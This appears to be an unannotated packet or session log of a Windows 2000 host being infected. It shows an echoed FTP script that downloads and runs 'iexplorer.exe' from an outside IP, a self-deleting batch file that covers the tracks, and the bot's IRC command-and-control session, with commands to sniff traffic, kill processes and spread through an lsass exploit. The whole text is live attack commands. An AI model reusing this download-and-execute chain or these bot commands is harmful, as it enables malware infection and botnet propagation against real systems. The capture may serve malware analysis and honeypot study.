Client: echo open 118.8.34.6 4889>.pif C:\\\\WINNT\\\\system32>


VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> 
VICTIM:  	echo open 118.8.34.6 4889>.pif C:\\WINNT\\system32> 
VICTIM:  	echo user a a>>.pif C:\\WINNT\\system32> 
VICTIM:  	echo binary>>.pif C:\\WINNT\\system32>echo GET iexplorer.exe>>.pif C:\\WINNT\\system32> 
VICTIM:  	echo bye>>.pif C:\\WINNT\\system32> 
VICTIM:  	echo @echo off >c.bat 
VICTIM:  	C:\\WINNT\\system32>echo ftp -n -v -s:.pif >>c.batC:\\WINNT\\system32> 
VICTIM:  	echo iexplorer.exe >>c.batC:\\WINNT\\system32> 
VICTIM:  	echo del .pif >>c.batC:\\WINNT\\system32> 
VICTIM:  	echo del /F c.bat >>c.batC:\\WINNT\\system32> 
VICTIM:  	echo exit /y >>c.batC:\\WINNT\\system32> 
VICTIM:  	c.bat 
ATTACKER:	220  
VICTIM:  	USER a 
ATTACKER:	331  
VICTIM:  	PASS a 
ATTACKER:	230  
VICTIM:  	TYPE I 
ATTACKER:	200  
VICTIM:  	PORT 192,168,1,30,4, 
ATTACKER:	200  
ATTACKER:	RETR iexplorer.exe 
ATTACKER:	150  
ATTACKER:	226  
VICTIM:  	QUIT 
ATTACKER:	221  
VICTIM:  	NICK `hltutvUSER `hltutv 0 0 :`hltutv 
ATTACKER:	:aaa.5125.com 001 `hltutv :time, `hltutv!~hltutv@192.168.1.182:aaa.5125.com 005 `hltutv MAP KNOCK SAFELIST HCN MAXCHANNELS=500 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server:aaa.5125.com 005 `hltutv WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=time CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server:aaa.5125.com 422 `hltutv :MOTD File is missing:`hltutv MODE `hltutv :+i 
VICTIM:  	JOIN #.has hs 
ATTACKER:	:`hltutv!~hltutv@192.168.1.182 JOIN :#.has:aaa.5125.com 332 `hltutv #.has :.join #.k `sniff.on -s |`adv.start lsass 100 3 0 x.x.x.x -r -s |`i.join #.sd:aaa.5125.com 333 `hltutv #.has d 1218136512:aaa.5125.com 353 `hltutv @ #.has :`hltutv @Hs :aaa.5125.com 366 `hltutv #.has :End of /NAMES list. 
VICTIM:  	USERHOST `hltutvJOIN #.has hsUSERHOST `hltutvJOIN #.has hsUSERHOST `hltutv 
ATTACKER:	:aaa.5125.com 302 `hltutv :`hltutv=+~hltutv@192.168.1.182    :aaa.5125.com 302 `hltutv :`hltutv=+~hltutv@192.168.1.182    :aaa.5125.com 302 `hltutv :`hltutv=+~hltutv@192.168.1.182     
VICTIM:  	JOIN #.sd  
ATTACKER:	:`hltutv!~hltutv@192.168.1.182 JOIN :#.sd:aaa.5125.com 332 `hltutv #.sd :`sniff.on -s |`pctrl.kill kiss.exe -s |`adv.start lsass 100 3 0 -r -b -s:aaa.5125.com 333 `hltutv #.sd d 1218138571:aaa.5125.com 353 `hltutv @ #.sd :`hltutv @Hs :aaa.5125.com 366 `hltutv #.sd :End of /NAMES list.